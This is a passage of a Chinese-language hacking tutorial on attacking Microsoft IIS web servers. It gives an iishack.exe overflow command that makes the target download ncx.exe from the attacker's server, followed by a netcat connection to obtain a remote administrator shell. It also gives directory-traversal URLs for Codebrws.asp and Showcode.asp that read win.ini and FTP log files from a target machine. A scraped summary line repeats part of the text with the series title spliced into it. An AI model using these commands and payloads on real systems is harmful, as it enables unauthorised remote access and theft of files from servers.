IIS攻击大全

核心提示： c:》iishack.exe 《目标机》 80 《你的WEB服务器》/ncx.exe然后你就使用netcat来连接你要检测的服务器：c:》nc 《目标机》 80如果溢出点正确，你就可以看到目标机器的命令行提示，IIS攻击大全(3)，并且是远程管理权限，Codebrws.asp & Show

c:》iishack.exe 《目标机》 80 《你的WEB服务器》/ncx.exe

然后你就使用netcat来连接你要检测的服务器：

c:》nc 《目标机》 80

如果溢出点正确，你就可以看到目标机器的命令行提示，并且是远程管理权限。Codebrws.asp & Showcode.asp 。Codebrws.asp和Showcode.asp在IIS4.0中是附带的看文件的程序，但不是默认安装的，这个查看器是在管理员允许查看样例文件作为联系的情况下安装的。但是，这个查看器并没有很好地限制所访问的文件，远程攻击者可以利用这个漏洞来查看目标机器上的任意文件内容，但要注意以下几点：

1．Codebrws.asp 和 Showcode.asp默认情况下不安装。

2．漏洞仅允许查看文件内容。

3．这个漏洞不能绕过WINDOWS NT的ACL控制列表的限制。

4．只允许同一分区下的文件可以被查看（所以把IIS目录和WINNT分区安装是个不错的方案，这样也可能比较好的防止最新的IIS5.0的unicode漏洞）.

5．攻击者需要知道请求的文件名。

例如你发现存在这个文件并符合上面的要求，你可以请求如下的命令：

http://www.目标机.com/iisamples/exair/howitworks/codebrws.asp?source=/

iisamples/exair/howitworks/codebrws.asp

你就可以查看到codebrws.asp的源代码了。

你也可以使用showcode.asp来查看文件：

http://www.目标机.com/msadc/samples/selector/showcode.asp?

source=/msadc/../../../../../winnt/win.ini

当然你也可以查看一些FTP信息来获得其他的目标管理员经常使用的机器，或许其他的机器的安全性比WEB服务器差，如：http://xxx.xxx.xxx.xxx/msadc/Samples/SELECTOR/showcode.asp?

source=/msadc/Samples/../../../../../winnt/system32/logfiles/MSFTPSVC1/ex000517.log